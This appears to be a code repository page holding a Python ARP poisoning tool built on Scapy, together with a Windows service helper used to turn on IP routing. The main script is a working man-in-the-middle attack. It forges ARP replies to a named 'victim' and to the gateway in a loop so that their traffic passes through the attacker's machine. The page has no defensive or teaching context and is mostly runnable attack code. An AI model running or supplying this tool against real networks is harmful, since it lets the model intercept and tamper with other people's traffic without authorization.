-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathArppoisoning.py
192 lines (168 loc) · 6.56 KB
/
Arppoisoning.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
from scapy.all import Ether, ARP, srp, send
import argparse
import time
import os
import sys
def _enable_linux_iproute():
"""
Enables IP route ( IP Forward ) in linux-based distro
"""
file_path = "/proc/sys/net/ipv4/ip_forward"
with open(file_path) as f:
if f.read() == 1:
# already enabled
return
with open(file_path, "w") as f:
print(1, file=f)
def _enable_windows_iproute():
"""
Enables IP route (IP Forwarding) in Windows
"""
from services import WService
# enable Remote Access service
service = WService("RemoteAccess")
service.start()
def enable_ip_route(verbose=True):
"""
Enables IP forwarding
"""
if verbose:
print("[!] Enabling IP Routing...")
_enable_windows_iproute() if "nt" in os.name else _enable_linux_iproute()
if verbose:
print("[!] IP Routing enabled.")
def get_mac(ip):
"""
Returns MAC address of any device connected to the network
If ip is down, returns None instead
"""
ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0)
if ans:
return ans[0][1].src
def spoof(target_ip, host_ip, verbose=True):
"""
Spoofs `target_ip` saying that we are `host_ip`.
it is accomplished by changing the ARP cache of the target (poisoning)
"""
# get the mac address of the target
target_mac = get_mac(target_ip)
# craft the arp 'is-at' operation packet, in other words; an ARP response
# we don't specify 'hwsrc' (source MAC address)
# because by default, 'hwsrc' is the real MAC address of the sender (ours)
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
# send the packet
# verbose = 0 means that we send the packet without printing any thing
send(arp_response, verbose=0)
if verbose:
# get the MAC address of the default interface we are using
self_mac = ARP().hwsrc
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
def restore(target_ip, host_ip, verbose=True):
"""
Restores the normal process of a regular network
This is done by sending the original informations
(real IP and MAC of `host_ip` ) to `target_ip`
"""
# get the real MAC address of target
target_mac = get_mac(target_ip)
# get the real MAC address of spoofed (gateway, i.e router)
host_mac = get_mac(host_ip)
# crafting the restoring packet
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac, op="is-at")
# sending the restoring packet
# to restore the network to its normal process
# we send each reply seven times for a good measure (count=7)
send(arp_response, verbose=0, count=7)
if verbose:
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ARP spoof script")
parser.add_argument("target", help="Victim IP Address to ARP poison")
parser.add_argument("host", help="Host IP Address, the host you wish to intercept packets for (usually the gateway)")
parser.add_argument("-v", "--verbose", action="store_true", help="verbosity, default is True (simple message each second)")
args = parser.parse_args()
target, host, verbose = args.target, args.host, args.verbose
enable_ip_route()
try:
while True:
# telling the `target` that we are the `host`
spoof(target, host, verbose)
# telling the `host` that we are the `target`
spoof(host, target, verbose)
# sleep for one second
time.sleep(1)
except KeyboardInterrupt:
print("[!] Detected CTRL+C ! restoring the network, please wait...")
restore(target, host)
restore(host, target)
services.py
import win32serviceutil
import time
class WService:
def __init__(self, service, machine=None, verbose=False):
self.service = service
self.machine = machine
self.verbose = verbose
@property
def running(self):
return win32serviceutil.QueryServiceStatus(self.service)[1] == 4
def start(self):
if not self.running:
win32serviceutil.StartService(self.service)
time.sleep(1)
if self.running:
if self.verbose:
print(f"[+] {self.service} started successfully.")
return True
else:
if self.verbose:
print(f"[-] Cannot start {self.service}")
return False
elif self.verbose:
print(f"[!] {self.service} is already running.")
def stop(self):
if self.running:
win32serviceutil.StopService(self.service)
time.sleep(0.5)
if not self.running:
if self.verbose:
print(f"[+] {self.service} stopped successfully.")
return True
else:
if self.verbose:
print(f"[-] Cannot stop {self.service}")
return False
elif self.verbose:
print(f"[!] {self.service} is not running.")
def restart(self):
if self.running:
win32serviceutil.RestartService(self.service)
time.sleep(2)
if self.running:
if self.verbose:
print(f"[+] {self.service} restarted successfully.")
return True
else:
if self.verbose:
print(f"[-] Cannot start {self.service}")
return False
elif self.verbose:
print(f"[!] {self.service} is not running.")
def main(action, service):
service = WService(service, verbose=True)
if action == "start":
service.start()
elif action == "stop":
service.stop()
elif action == "restart":
service.restart()
# getattr(remoteAccessService, action, "start")()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Windows Service Handler")
parser.add_argument("service")
parser.add_argument("-a", "--action", help="action to do, 'start', 'stop' or 'restart'",
action="store", required=True, dest="action")
given_args = parser.parse_args()
service, action = given_args.service, given_args.action
main(action, service)